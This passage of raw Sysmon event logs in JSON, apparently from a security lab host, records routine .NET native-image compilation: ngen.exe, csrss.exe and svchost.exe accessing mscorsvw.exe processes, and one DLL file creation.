C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-001058511100}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.278","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-001058511100}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7681,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.278\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-001058511100}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.278","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-001058511100}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7682,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.278\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-001058511100}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.278","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-001058511100}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7683,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:50.762\r\nProcessGuid: {A837DB8D-04D6-5F25-0000-001058511100}\r\nProcessId: 4852\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12f4-0\\System.ServiceModel.Internals.dll\r\nCreationUtcTime: 2020-08-01 05:59:50.762","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:50.762","ProcessGuid":"{A837DB8D-04D6-5F25-0000-001058511100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12f4-0\\System.ServiceModel.Internals.dll","CreationUtcTime":"2020-08-01 05:59:50.762","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7684,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.809\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-001014551100}\r\nTargetProcessId: 2188\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.809","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-001014551100}","TargetProcessId":"2188","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7685,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.809\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-001014551100}\r\nTargetProcessId: 2188\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.809","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-001014551100}","TargetProcessId":"2188","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7686,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.825\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-001014551100}\r\nTargetProcessId: 2188\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.825","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-001014551100}","TargetProcessId":"2188","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7687,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.871\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-0010F2581100}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.871","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-0010F2581100}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7688,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.871\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-0010F2581100}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.871","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-0010F2581100}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7689,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-0010F2581100}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 